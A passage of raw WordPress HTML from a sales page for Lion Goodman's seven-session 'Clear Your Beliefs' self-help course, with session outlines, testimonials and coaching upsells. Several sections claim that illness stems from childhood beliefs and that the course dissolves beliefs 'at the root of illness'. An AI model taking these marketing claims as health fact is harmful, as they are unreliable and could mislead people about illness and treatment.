you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" 